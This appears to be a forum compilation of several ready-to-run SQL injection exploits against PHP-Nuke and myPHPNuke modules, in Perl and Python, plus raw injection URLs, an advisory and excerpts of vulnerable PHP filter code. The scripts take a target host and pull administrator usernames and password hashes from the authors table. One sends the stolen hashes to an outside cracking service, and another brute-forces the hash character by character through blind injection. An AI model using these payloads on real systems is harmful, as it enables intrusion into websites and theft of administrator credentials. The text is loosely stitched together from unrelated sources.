#!/usr/bin/perl  
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("

    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
    |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
   ##################################################  #####
   # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
   ##################################################  #####
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:  #:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                           |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:  #:#:#:#:#
#:-------------------------------------------------------:#
:#|                   EXAMPLE:                          |#:
:#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:  #:#:#:#:#

");
}
sub problem{
     print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
     exit();
}
sub exploitation{
      
     $conn = LWP::UserAgent -> new;
     $conn->agent('Checkbot/0.4 ');
     $query_pwd =
$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%  2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_auth  ors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
     $return_pwd = $conn->get($query_pwd) || problem();
     $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
     print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
    }

getopts(":h:p:U:",\%args);
      $host = $args{h} if (defined $args{h});
      $path = $args{p} if (defined $args{p});
      $user_id= $args{U}if (defined $args{U});
       
      if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
         usg();
      }
      else{
         exploitation();
      }

modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%  2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2  A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%  2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2  A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A  

http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),
2/**/from/**/nuke_authors/*where%20admin%20-2

Код:
#!/usr/bin/python  
# PHP-Nuke Gaestebuch Module SQL Injection Exploit  
# Coded By Shahin Ramezany For Fun  
# E-Mail : Admin@secuiran.com   
   
import string  
import urllib  
import sys  
import re  
   
def Secuiran():  
         print "\n"  
         print "##################################################  ###"  
         print "#                WwW.Secuiran.Com                   #"  
         print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit  #"  
         print "#  Coded By Shahin . Ramezany (Vampire) For Fun     #"  
         print "# Keep It Priv8 && Never Post In Public Forum's     #"  
         print "#          E-Mail : Admin@Secuiran.com             #"  
         print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix  #"  
         print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's   #"  
         print "##################################################  ###"  
         print "\n"  
   
   
   
   
#Call Banner  
Secuiran()  
   
print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/"  
try:  
         host=raw_input("\nTarget Host (with http) : ")  
except KeyboardInterrupt:  
         print "\n[-] Program Terminated"  
         sys.exit()  
   
print "\n[+] Output File: e.e: secuiran.txt"  
   
try:  
         secuiran=raw_input("\nOutput File: ")  
except KeyboardInterrupt:  
         print "\n[-] Program Terminated"  
         sys.exit()  
   
print "\n[+] Trying  To Connect ...\n"  
   
#SQL Injection URL  
sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors  +where+radminsuper=1"  
   
response = urllib.urlopen(sql_inject).read()  
   
print "[+] Trying  To Inject Code ...\n"  
#Extract Admin User  
   
findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall  
found_users=findall_users(response)  
   
#check found user length  
if len(found_users)==0:  
     print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "  
     sys.exit()  
   
#Extract Admin Hash  
response = urllib.urlopen(sql_inject).read()  
findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall  
found_hashs=findall_hashs(response)  
if len(found_hashs)==0:  
     print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "  
     sys.exit()  
   
   
#Crack The Hash  
md5 = string.join( found_hashs, '' )  
print "[+] Trying To Crack The Hash ..."  
crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5  
result = urllib.urlopen(crack).read()  
cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall  
if re.match(result,"MD5_1_result,"+md5+" - not found"):  
    print "[-] Can Not Crack"  
    #sys.exit()  
   
found=cracked(result)  
#Convert List To String  
cracked_md5 = string.join( found, '' )  
   
#Print All Info  
Secuiran()  
print "\n[+] Host : ",host  
for i in range(len(found_users)):  
         print "\n[+] Admin User :  ",found_users[i]  
         print "\n[+] Admin Hash :  ",found_hashs[i]  
if (cracked_md5 == "not"):  
         print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!"  
else:  
         print "\n[+] Hash Cracked Successfully : ",cracked_md5  
   
#Save All Info In File  
file = open(secuiran, "w")  
file.write("**************************************************  WwW.Secuiran.Com**********************************  ****************\n")  
file.write("\n")  
file.write("HOST :")  
file.write("       ")  
file.write(host)  
file.write("\n")  
file.write("\n")  
file.write("USER                        HASH\n")  
file.write("            ")  
file.write("\n")  
for i in range(len(found_users)):  
     file.write(found_users[i])  
     file.write("                         ")  
     file.write(found_hashs[i])  
     file.write("\n")  
file.write("\n")  
if (cracked_md5 == "not"):  
         file.write("\n")  
         file.write("I Can't Crack Your Hash")  
else:  
         file.write("Cracked :")  
         file.write("            ")  
         file.write("\n")  
         file.write(cracked_md5)  
         file.write("\n")  
         file.write("**************************************************  WwW.Secuiran.Com**********************************  ****************\n")  
file.close()  
print "\n[+] Successfully, Writed To ",secuiran," File ."

#!/usr/bin/python
#=================================================  ==============================
==================#
#                    This is a Priv8 Exploit.                    #
#                    Date: 23/02/2008 [dd,mm,yyyy]                    #
#                    #
#=================================================  ==============================
==================#
#                 PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2            #
#                    Response Analisys Method                    #
#                    #
#                    Vendor:   http://www.phpnuke.org                          #
#                    Severity:   Highest                    #
#                    Author:   The:Paradox                    #
#=================================================  ==============================
==================#                    
#              Server configuration requirments:                    #
#                magic_quotes_gpc = 0                    #   
#=================================================  ==============================
==================#                    
#                    Proud To Be Italian.                    #
#=================================================  ==============================
==================#
"""                    
                    Related Codes:
                    mainfile.php; line 89;

if (!ini_get('register_globals')) {
   @import_request_variables("GPC", "");
}
              /Your_Account/index.php; line 1700;
switch($op) {
//   [..]
   case "activate":
   activate($username, $check_num);
   break;
//   [..]   
   }
                    /Your_Account/index.php; line 161:

function activate($username, $check_num) {
   global $db, $user_prefix, $module_name, $language, $prefix;
   $username = filter($username, "nohtml", 1);
   $past = time()-86400;
   $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
   $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
   echo $sql;   
   $result = $db->sql_query($sql);

"""
#=================================================  ==============================
==================#
# Proof Of Concept / Bug Explanation:                    #
#                    #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable.       #
# Byte null bypasses all query string check.                    #
#                    #
#=================================================  ==============================
==================#
# Google Dork=> Powered by PHPNuke                    #
#=================================================  ==============================
==================#
# Use this at your own risk. You are responsible for your own deeds.                    #
#=================================================  ==============================
==================#
#                    Python Exploit Starts                    #
#=================================================  ==============================
==================#
import httplib, sys, time
print "\n#===============================================  ==========#"
print "             PHPNuke <= 8.0 And Maybe Higher             "
print "          Blind Sql Injection Vulnerability Mq=0         "
print "                Response Analisys Method                 "
print "                    "
print "                Discovered By The:Paradox                "         
print "                    "
print " Usage:                    "
print " python %s [Target] [Path] [UsernameUnveryfied]          " % (sys.argv[0])
print "                    "   
print " Example:                    "         
print " python %s 127.0.0.1 /Nuke/ Abdullah                     " % (sys.argv[0])
print " python %s www.host.com / Andrea                         " % (sys.argv[0])   
print "                    "   
print "                    "     
print "#=================================================  ========#\n"
if len(sys.argv)<=3:   sys.exit()
else:   print "[.]Exploit Starting."

target = sys.argv[1]
path = sys.argv[2]

prefix = "nuke_"
port = "80"

j=1
h4sh = ""
md5tuple = []

for k in range(48,58):  md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103): md5tuple.append(k)
md5tuple.append('END')

# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'   
#

print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
   for i in md5tuple:
      if i == 'END':   sys.exit('[-]Exploit Failed.\n')

      conn = httplib.HTTPConnection(target,port)
      conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd  ," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})

      response = conn.getresponse()

      time.sleep(0.5)     
      if response.status == 404: sys.exit('[-]Error 404. Not Found.')     
      if response.read().find("New user verification number is invalid.") != -1:
         sys.stdout.write(chr(i))
         sys.stdout.flush()
         h4sh += chr(i)
         j += 1
         break;

print "\n\n[+]All Done.\n-=Paradoxe=-"

##################################################  ##########

SQL Injection vulnerability in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2398/

Description: There is SQL Injection vulnerability in printfeature.php in
myPHPNuke.

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,n  ull,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
additional filters were added, so it is not vulnerable to this attack. But
version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
Injection attack is possible (without using spaces and brackets).

##################################################  ##########

# milw0rm.com [2008-09-02]

$uname = filter($cookie[1], "nohtml");  
     $id = intval($id);  
     $score = intval($score);  
     if (is_user($user)) {  
         $krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));  
         if ($krow['karma'] == 2) {  
             $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");  
             include("header.php");  
             title(""._MODERATEDTITLE."");  
             OpenTable();  
             echo "<center>"._COMMENTMODERATED."";  
             echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";  
             CloseTable();  
             include("footer.php");  
             die();  
         } elseif ($krow['karma'] == 3) {  
             Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");  
             die();  
         }  
     }  
     $db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");

function filter($what, $strip="", $save="", $type="") {  
     if ($strip == "nohtml") {  
         $what = check_html($what, $strip);  
//        $what = htmlentities(trim($what), ENT_QUOTES);  
         // If the variable $what doesn't comes from a preview screen should be converted  
         if ($type != "preview" AND $save != 1) {  
             $what = html_entity_decode($what, ENT_QUOTES);  
         }  
     }  
     if ($save == 1) {  
         $what = check_words($what);  
         $what = check_html($what, $strip);  
         if (!get_magic_quotes_gpc()) {  
         $what = addslashes($what);  
}  
     } else {  
         $what = stripslashes(FixQuotes($what,$strip));  
         $what = check_words($what);  
         $what = check_html($what, $strip);  
     }  
     return($what);  
}

function check_html ($str, $strip="") {  
     /* The core of this code has been lifted from phpslash */  
     /* which is licenced under the GPL. */  
     include("config.php");  
     if ($strip == "nohtml")  
     $AllowableHTML=array('');  
     $str = stripslashes($str);  
     $str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);  
     // Delete all spaces from html tags .  
     $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);  
     // Delete all attribs from Anchor, except an href, double quoted.  
     $str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);  
     // Delete all img tags  
     $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);  
     // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com  
     $tmp = "";  
     while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {  
         $i = strpos($str,$reg[0]);  
         $l = strlen($reg[0]);  
         if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));  
         else $tag = strtolower($reg[1]);  
         if ($a = $AllowableHTML[$tag])  
         if ($reg[1][0] == "/") $tag = "</$tag>";  
         elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>";  
         else {  
             # Place here the double quote fix function.  
             $attrb_list=delQuotes($reg[2]);  
             // A VER  
             //$attrb_list = ereg_replace("&","&",$attrb_list);  
             $tag = "<$tag" . $attrb_list . ">";  
         } # Attribs in tag allowed  
         else $tag = "";  
         $tmp .= substr($str,0,$i) . $tag;  
         $str = substr($str,$i+$l);  
     }  
     $str = $tmp . $str;  
     return $str;  
     exit;  
     /* Squash PHP tags unconditionally */  
     $str = ereg_replace("<\?","",$str);  
     return $str;  
}